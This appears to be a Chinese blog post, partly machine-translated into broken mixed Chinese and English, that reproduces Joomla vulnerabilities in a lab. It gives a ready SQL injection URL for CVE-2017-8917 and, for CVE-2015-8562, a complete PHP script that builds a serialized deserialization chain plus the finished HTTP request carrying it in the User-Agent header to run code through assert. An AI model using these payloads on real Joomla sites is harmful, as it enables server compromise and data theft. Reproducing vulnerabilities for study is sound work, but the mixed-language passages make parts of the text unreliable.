Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现

Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险.

这个有点长,I don't understand the script yet,明天再写

Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞

漏洞原理：传送门
直接在kailOpen environment,找了payload：

http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

Joomla 3.4.5 反序列化漏洞（CVE-2015-8562）

还是kailOpen the environment directly
The source of this vulnerability is PHP5.6.13The previous version was reading the stored goodsession时,If there is an error in deserialization, the current piece of data will be skipped and the next piece of data will be deserialized.而Joomla将session存储在Mysql数据库中,编码是utf8,当我们插入4字节的utf8data will result in truncation.The truncated data will fail when deserialized,Finally trigger the deserialization vulnerability.
通过Joomla中的Gadget,Can cause arbitrary code execution results.

影响版本：
Joomla 1.5.x, 2.x, and 3.x before 3.4.6
PHP 5.6 < 5.6.13, PHP 5.5 < 5.5.29 and PHP 5.4 < 5.4.45

复现：
我们不带User-Agent头,Visit the target home page first,Make a note of what the server returnsCookie：

Generate with a scriptpoc

<?php
class JSimplepieFactory {
    
}
class JDatabaseDriverMysql {
    

}
class SimplePie {
    
    var $sanitize;
    var $cache;
    var $cache_name_function;
    var $javascript;
    var $feed_url;
    function __construct()
    {
    
        $this->feed_url = "phpinfo();JFactory::getConfig();exit;";
        $this->javascript = 9999;
        $this->cache_name_function = "assert";
        $this->sanitize = new JDatabaseDriverMysql();
        $this->cache = true;
    }
}

class JDatabaseDriverMysqli {
    
    protected $a;
    protected $disconnectHandlers;
    protected $connection;
    function __construct()
    {
    
        $this->a = new JSimplepieFactory();
        $x = new SimplePie();
        $this->connection = 1;
        $this->disconnectHandlers = [
            [$x, "init"],
        ];
    }
}

$a = new JDatabaseDriverMysqli();
$poc = serialize($a);

$poc = str_replace("\x00*\x00", '\\0\\0\\0', $poc);

echo "123}__test|{
      $poc}\xF0\x9D\x8C\x86";

得到

constitute this dataUser-AgentHead and bring just the first timecookiePackage together

GET / HTTP/1.1
Host: host:8080
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cabfd193a7cc3d4f5d606acc35b17e3a=64e15809c82dd54e9fdf723a9342dd18
User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{
    s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{
    }s:21:"\0\0\0disconnectHandlers";a:1:{
    i:0;a:2:{
    i:0;O:9:"SimplePie":5:{
    s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{
    }s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}4
Content-Length: 2

Our code executes